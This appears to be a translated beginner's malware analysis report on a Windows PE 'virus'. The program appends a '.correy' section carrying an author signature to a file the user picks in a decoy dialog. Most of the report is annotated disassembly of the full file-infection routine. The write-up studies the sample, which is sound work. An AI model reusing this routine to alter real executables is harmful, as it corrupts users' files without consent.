Analysis of a simple PE section-adding virus
A beginner's virus analysis
Basic information
Report name: Analysis of a simple PE section-adding virus
Author:
Report updated: 2012.07.08
Sample discovery date:
Sample type:
Sample file size / change in length of infected files:
Sample MD5:
Sample SHA1:
Packer information:
Potentially affected systems: Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows Vista
Microsoft Windows 7
Related vulnerabilities:
Known detection names:
Summary
A PE file-infecting virus.
Symptoms on infected systems and networks
File system changes
A decoy Windows file dialog is shown; the file the user selects is modified.
Registry changes
Detailed analysis / functionality
1. On launch, the program displays a file-selection dialog.
2. Once a file is chosen, the program obtains its path, opens it and creates a file mapping.
3. It reads the entry address, the header size, the number of sections, the alignment granularity and related fields.
4. It checks whether a section can be appended directly; if not, it first relocates the data that follows the section table.
5. It adds a section and writes the section's header fields.
6. It rewrites the PE size fields and the section count.
7. It closes the file and exits the process.
Prevention and remediation
Check that a program is safe before running it, and install antivirus software.
Technical highlights and summary
For a beginner like me there is still plenty to learn here: the API used for the decoy UI, GetOpenFileName, and the LPOPENFILENAME structure.
GetOpenFileName creates an Open common dialog box that lets the user specify the drive, directory and name of a file to open. If the user specifies a file name and clicks OK, the return value is nonzero, and the buffer pointed to by the lpstrFile member of the OPENFILENAME structure contains the full path and the file name the user specified. If the user cancels or closes the Open dialog box, or an error occurs, the return value is zero.
The OPENFILENAME structure contains the information that GetOpenFileName and GetSaveFileName use to initialize an Open or Save As dialog box. After the user closes the dialog box, the system returns information about the user's selection in this structure.
The program needs not only the address of the mapped data but also the relative offset (the file offset), because that is what matters when moving the file pointer before writing to the file.
Disassembly:
Function that returns the aligned size
.text:00401000 ; Attributes: bp-based frame
.text:00401000
.text:00401000 sub_401000 proc near ; CODE XREF: start+2F7p
.text:00401000 ; start+32Bp ...
.text:00401000
.text:00401000 arg_0 = dword ptr 8
.text:00401000 arg_4 = dword ptr 0Ch
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 push edx
.text:00401004 mov eax, [ebp+arg_0]
.text:00401007 xor edx, edx
.text:00401009 div [ebp+arg_4]
.text:0040100C cmp edx, 0
.text:0040100F jz short loc_401012
.text:00401011 inc eax
.text:00401012
.text:00401012 loc_401012: ; CODE XREF: sub_401000+Fj
.text:00401012 mul [ebp+arg_4]
.text:00401015 pop edx
.text:00401016 leave
.text:00401017 retn 8
.text:00401017 sub_401000 endp
.text:00401017
Entry function
Decoy UI
.text:0040101A
.text:0040101A public start
.text:0040101A start proc near
.text:0040101A mov OpenFileNAme.lStructSize, 4Ch
.text:00401024 mov OpenFileNAme.lpstrFilter, offset aPeFile_exe_dll ; "pe File (*.exe, *.dll)"
.text:0040102E mov OpenFileNAme.lpstrFile, offset NumberOfBytesWritten
.text:00401038 mov OpenFileNAme.nMaxFile, 200h ; lpstrFile receives the user's selection, i.e. the path of the chosen file
.text:00401042 mov OpenFileNAme.Flags, 281804h
.text:0040104C push offset OpenFileNAme ; LPOPENFILENAMEA
.text:00401051 call GetOpenFileNameA ; create the Open common dialog
Open the file and create a mapping
.text:00401056 push 0 ; hTemplateFile
.text:00401058 push 80h ; dwFlagsAndAttributes
.text:0040105D push 3 ; dwCreationDisposition
.text:0040105F push 0 ; lpSecurityAttributes
.text:00401061 push 3 ; dwShareMode
.text:00401063 push 0C0000000h ; dwDesiredAccess
.text:00401068 push offset NumberOfBytesWritten ; lpFileName
.text:0040106D call CreateFileA ; open the selected file
.text:00401072 mov hFile, eax
.text:00401077 push 0 ; lpName
.text:00401079 push 0 ; dwMaximumSizeLow
.text:0040107B push 0 ; dwMaximumSizeHigh
.text:0040107D push 2 ; flProtect
.text:0040107F push 0 ; lpFileMappingAttributes
.text:00401081 push eax ; hFile
.text:00401082 call CreateFileMappingA
.text:00401087 push 0 ; dwNumberOfBytesToMap
.text:00401089 push 0 ; dwFileOffsetLow
.text:0040108B push 0 ; dwFileOffsetHigh
.text:0040108D push 4 ; dwDesiredAccess
.text:0040108F push eax ; hFileMappingObject
.text:00401090 call MapViewOfFile
.text:00401095 mov map_address, eax ; map a view of the file; returns the mapping base address
Read the PE file information
.text:0040109A mov esi, map_address
.text:004010A0 add esi, 3Ch
.text:004010A3 mov esi, [esi]
.text:004010A5 mov peheader_rva, esi
.text:004010AB mov eax, map_address
.text:004010B0 add esi, eax
.text:004010B2 mov peheader, esi
.text:004010B8 mov esi, peheader
.text:004010BE add esi, 6
.text:004010C1 mov dx, [esi]
.text:004010C4 movsx edx, dx
.text:004010C7 mov section_number, edx
.text:004010CD mov esi, peheader
.text:004010D3 add esi, 18h
.text:004010D6 mov option_header, esi
.text:004010DC mov esi, peheader
.text:004010E2 add esi, 14h
.text:004010E5 mov dx, [esi]
.text:004010E8 movsx edx, dx
.text:004010EB mov sizeof_optionheader, edx
.text:004010F1 mov esi, peheader
.text:004010F7 add esi, 54h
.text:004010FA mov esi, [esi]
.text:004010FC mov check_sum, esi
.text:00401102 mov eax, map_address
.text:00401107 add eax, check_sum
.text:0040110D mov map_address_csum, eax
.text:00401112 mov esi, peheader
.text:00401118 add esi, 38h
.text:0040111B mov esi, [esi]
.text:0040111D mov sectionalign, esi
.text:00401123 mov esi, peheader
.text:00401129 add esi, 3Ch
.text:0040112C mov esi, [esi]
.text:0040112E mov filealign, esi
.text:00401134 mov esi, option_header
.text:0040113A add esi, sizeof_optionheader
.text:00401140 mov sectiontable, esi
.text:00401146 mov eax, 28h
.text:0040114B mov ebx, section_number
.text:00401151 mul ebx
.text:00401153 add eax, sectiontable
.text:00401159 mov sectionbackadress, eax ; address of the end of the section table
.text:0040115E sub eax, map_address
.text:00401164 mov lDistanceToMove, eax ; relative (file) offset
.text:00401169 mov eax, sectionbackadress
.text:0040116E sub eax, 28h
.text:00401171 mov esi, eax
.text:00401173 lea edi, a_correy ; ".correy "
.text:00401179 mov ecx, 8
.text:0040117E repe cmpsb
Infection marker: the name of the last section
.text:00401180 jz loc_401528 ; compare the name of the last section with .correy
.text:00401180 ; if it matches, exit
.text:00401186 lea esi, OpenFileNAme.pvReserved
.text:0040118C mov eax, map_address
.text:00401191 add eax, lDistanceToMove
.text:00401197 mov edi, eax
.text:00401199 mov ecx, 28h
.text:0040119E repe cmpsb ; check whether the slot for the new section header is usable
.text:004011A0 jz loc_401278 ; usable: go add the section
Relocate the data after the section table
.text:004011A6 mov eax, check_sum ; not usable: first move the data following the section table, then add the section
.text:004011AB sub eax, lDistanceToMove
.text:004011B1 mov chsum_rvalast, eax
.text:004011B6 mov ecx, eax
.text:004011B8 mov eax, map_address
.text:004011BD add eax, check_sum
.text:004011C3 mov esi, eax
.text:004011C5 lea edi, unk_403278
.text:004011CB
.text:004011CB loc_4011CB: ; CODE XREF: start+1BBj
.text:004011CB dec esi
.text:004011CC inc edi
.text:004011CD mov bl, [esi]
.text:004011CF mov [edi], bl
.text:004011D1 dec ecx
.text:004011D2 cmp ecx, 0
.text:004011D5 jnz short loc_4011CB
.text:004011D7 mov ecx, 0FFFFFFFFh
.text:004011DC lea esi, unk_403278
.text:004011E2
.text:004011E2 loc_4011E2: ; CODE XREF: start+1CEj
.text:004011E2 inc esi
.text:004011E3 inc ecx
.text:004011E4 mov al, [esi]
.text:004011E6 cmp al, 0
.text:004011E8 jz short loc_4011E2
.text:004011EA cmp ecx, 28h
.text:004011ED jb loc_40153A
.text:004011F3 mov dword_403ABA, ecx
.text:004011F9 mov eax, chsum_rvalast
.text:004011FE sub eax, ecx
.text:00401200 mov nNumberOfBytesToWrite, eax
.text:00401205 mov ecx, chsum_rvalast
.text:0040120B inc ecx
.text:0040120C mov eax, map_address
.text:00401211 add eax, lDistanceToMove
.text:00401217 mov esi, eax
.text:00401219 lea edi, unk_40367B
.text:0040121F dec esi
.text:00401220 dec edi
.text:00401221
.text:00401221 loc_401221: ; CODE XREF: start+211j
.text:00401221 inc esi
.text:00401222 inc edi
.text:00401223 mov bl, [esi]
.text:00401225 mov [edi], bl
.text:00401227 dec ecx
.text:00401228 cmp ecx, 0
.text:0040122B jnz short loc_401221
.text:0040122D push 0 ; dwMoveMethod
.text:0040122F push 0 ; lpDistanceToMoveHigh
.text:00401231 push lDistanceToMove ; lDistanceToMove
.text:00401237 push hFile ; hFile
.text:0040123D call SetFilePointer
.text:00401242 push 0 ; lpOverlapped
.text:00401244 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401249 push 28h ; nNumberOfBytesToWrite
.text:0040124B push offset unk_403150 ; lpBuffer
.text:00401250 push hFile ; hFile
.text:00401256 call WriteFile
.text:0040125B push 0 ; lpOverlapped
.text:0040125D push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401262 push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00401268 push offset unk_40367B ; lpBuffer
.text:0040126D push hFile ; hFile
.text:00401273 call WriteFile
.text:00401278
.text:00401278 loc_401278: ; CODE XREF: start+186j
Add the section header
.text:00401278 mov eax, peheader_rva
.text:0040127D add eax, 6
.text:00401280 push 0 ; dwMoveMethod
.text:00401282 push 0 ; lpDistanceToMoveHigh
.text:00401284 push eax ; lDistanceToMove
.text:00401285 push hFile ; hFile
.text:0040128B call SetFilePointer
.text:00401290 inc section_number
.text:00401296 push 0 ; lpOverlapped
.text:00401298 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:0040129D push 2 ; nNumberOfBytesToWrite
.text:0040129F push offset section_number ; lpBuffer
.text:004012A4 push hFile ; hFile
.text:004012AA call WriteFile ; increment the number of sections by 1
.text:004012AF push 0 ; dwMoveMethod
.text:004012B1 push 0 ; lpDistanceToMoveHigh
.text:004012B3 push lDistanceToMove ; lDistanceToMove
.text:004012B9 push hFile ; hFile
.text:004012BF call SetFilePointer ; move the file pointer to the new section header, ready to write its data
.text:004012C4 push 0 ; lpOverlapped
.text:004012C6 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004012CB push 8 ; nNumberOfBytesToWrite
.text:004012CD push offset a_correy ; ".correy "
.text:004012D2 push hFile ; hFile
.text:004012D8 call WriteFile ; write the section name
.text:004012DD push offset String ; "made by correy QQ:112426112 Email:legua"...
.text:004012E2 call lstrlenA
.text:004012E7 mov nNumberOfBytesToWrite, eax
.text:004012EC push 0 ; lpOverlapped
.text:004012EE push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004012F3 push 4 ; nNumberOfBytesToWrite
.text:004012F5 push offset nNumberOfBytesToWrite ; lpBuffer
.text:004012FA push hFile ; hFile
.text:00401300 call WriteFile ; write the size of the data above, i.e. the section size
.text:00401305 push sectionalign
.text:0040130B push nNumberOfBytesToWrite
.text:00401311 call sub_401000 ; returns the aligned size
.text:00401316 mov dword_403AD2, eax
.text:0040131B mov eax, sectionbackadress
.text:00401320 sub eax, 1Ch
.text:00401323 mov eax, [eax]
.text:00401325 mov dword_403ABA, eax
.text:0040132A mov eax, sectionbackadress
.text:0040132F sub eax, 20h
.text:00401332 mov eax, [eax]
.text:00401334 mov nNumberOfBytesToWrite, eax
.text:00401339 push sectionalign
.text:0040133F push nNumberOfBytesToWrite
.text:00401345 call sub_401000 ; returns the aligned size
.text:0040134A add eax, dword_403ABA
.text:00401350 mov dword_403ABA, eax
.text:00401355 push 0 ; lpOverlapped
.text:00401357 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:0040135C push 4 ; nNumberOfBytesToWrite
.text:0040135E push offset dword_403ABA ; lpBuffer
.text:00401363 push hFile ; hFile
.text:00401369 call WriteFile ; compute the aligned in-memory size and write it
.text:0040136E push filealign
.text:00401374 push nNumberOfBytesToWrite
.text:0040137A call sub_401000 ; returns the aligned size
.text:0040137F mov dword_403AC6, eax
.text:00401384 push 0 ; lpOverlapped
.text:00401386 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:0040138B push 4 ; nNumberOfBytesToWrite
.text:0040138D push offset dword_403AC6 ; lpBuffer
.text:00401392 push hFile ; hFile
.text:00401398 call WriteFile
.text:0040139D mov eax, sectionbackadress
.text:004013A2 sub eax, 14h
.text:004013A5 mov eax, [eax]
.text:004013A7 mov nNumberOfBytesToWrite, eax
.text:004013AC mov eax, sectionbackadress
.text:004013B1 sub eax, 18h
.text:004013B4 mov eax, [eax]
.text:004013B6 add eax, nNumberOfBytesToWrite
.text:004013BC mov dword_403AC2, eax
.text:004013C1 push 0 ; lpOverlapped
.text:004013C3 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004013C8 push 4 ; nNumberOfBytesToWrite
.text:004013CA push offset dword_403AC2 ; lpBuffer
.text:004013CF push hFile ; hFile
.text:004013D5 call WriteFile ; write the raw (on-disk) offset
.text:004013DA mov eax, lDistanceToMove
.text:004013DF add eax, 24h
.text:004013E2 push 0 ; dwMoveMethod
.text:004013E4 push 0 ; lpDistanceToMoveHigh
.text:004013E6 push eax ; lDistanceToMove
.text:004013E7 push hFile ; hFile
.text:004013ED call SetFilePointer
.text:004013F2 push 0 ; lpOverlapped
.text:004013F4 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004013F9 push 4 ; nNumberOfBytesToWrite
.text:004013FB push offset asc_403082 ; " "
.text:00401400 push hFile ; hFile
.text:00401406 call WriteFile ; write the section characteristics
.text:0040140B mov eax, peheader
.text:00401410 add eax, 1Ch
.text:00401413 mov eax, [eax]
.text:00401415 add eax, dword_403AC6
.text:0040141B mov newfilesize, eax
.text:00401420 mov ebx, peheader_rva
.text:00401426 add ebx, 1Ch
.text:00401429 push 0 ; dwMoveMethod
.text:0040142B push 0 ; lpDistanceToMoveHigh
.text:0040142D push ebx ; lDistanceToMove
.text:0040142E push hFile ; hFile
.text:00401434 call SetFilePointer
.text:00401439 push 0 ; lpOverlapped
.text:0040143B push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401440 push 4 ; nNumberOfBytesToWrite
.text:00401442 push offset newfilesize ; lpBuffer
.text:00401447 push hFile ; hFile
.text:0040144D call WriteFile ; rewrite the new file size
.text:00401452 mov eax, peheader
.text:00401457 add eax, 50h
.text:0040145A mov eax, [eax]
.text:0040145C add eax, dword_403AD2
.text:00401462 mov dword_403ACE, eax
.text:00401467 mov ebx, peheader_rva
.text:0040146D add ebx, 50h
.text:00401470 push 0 ; dwMoveMethod
.text:00401472 push 0 ; lpDistanceToMoveHigh
.text:00401474 push ebx ; lDistanceToMove
.text:00401475 push hFile ; hFile
.text:0040147B call SetFilePointer
.text:00401480 push 0 ; lpOverlapped
.text:00401482 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401487 push 4 ; nNumberOfBytesToWrite
.text:00401489 push offset dword_403ACE ; lpBuffer
.text:0040148E push hFile ; hFile
.text:00401494 call WriteFile ; modify sizeofheader
.text:00401499 push 0 ; dwMoveMethod
.text:0040149B push 0 ; lpDistanceToMoveHigh
.text:0040149D push dword_403AC2 ; lDistanceToMove
.text:004014A3 push hFile ; hFile
Write the file
.text:004014A9 call SetFilePointer
.text:004014AE push 0 ; lpOverlapped
.text:004014B0 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004014B5 push 55h ; nNumberOfBytesToWrite
.text:004014B7 push offset String ; "made by correy QQ:112426112 Email:legua"...
.text:004014BC push hFile ; hFile
.text:004014C2 call WriteFile
.text:004014C7 mov eax, dword_403AC6
.text:004014CC add eax, dword_403AC2
.text:004014D2 push eax
.text:004014D3 push 0 ; dwMoveMethod
.text:004014D5 push 0 ; lpDistanceToMoveHigh
.text:004014D7 push eax ; lDistanceToMove
.text:004014D8 push hFile ; hFile
.text:004014DE call SetFilePointer
.text:004014E3 pop eax
.text:004014E4 sub eax, 55h
.text:004014E7 push 0 ; dwMoveMethod
.text:004014E9 push 0 ; lpDistanceToMoveHigh
.text:004014EB push eax ; lDistanceToMove
.text:004014EC push hFile ; hFile
.text:004014F2 call SetFilePointer
.text:004014F7 push 0 ; lpOverlapped
.text:004014F9 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004014FE push 55h ; nNumberOfBytesToWrite
.text:00401500 push offset String ; "made by correy QQ:112426112 Email:legua"...
.text:00401505 push hFile ; hFile
.text:0040150B call WriteFile ; write the file
.text:00401510 push hFile ; hFile
.text:00401516 call FlushFileBuffers
.text:0040151B push hFile ; hObject
.text:00401521 call CloseHandle
.text:00401526 jmp short loc_40154A
.text:00401528 ; ---------------------------------------------------------------------------
.text:00401528
.text:00401528 loc_401528: ; CODE XREF: start+166j
.text:00401528 push 0 ; uType
.text:0040152A push 0 ; lpCaption
.text:0040152C push offset Text ; "文?
.text:00401531 push 0 ; hWnd
.text:00401533 call MessageBoxA
.text:00401538 jmp short loc_40154A
.text:0040153A ; ---------------------------------------------------------------------------
.text:0040153A
.text:0040153A loc_40153A: ; CODE XREF: start+1D3j
.text:0040153A push 0 ; uType
.text:0040153C push 0 ; lpCaption
.text:0040153E push offset asc_403086 ; "节头?
.text:00401543 push 0 ; hWnd
.text:00401545 call MessageBoxA
.text:0040154A
.text:0040154A loc_40154A: ; CODE XREF: start+50Cj
.text:0040154A ; start+51Ej
.text:0040154A push 0 ; uExitCode
.text:0040154C call ExitProcess
.text:0040154C start endp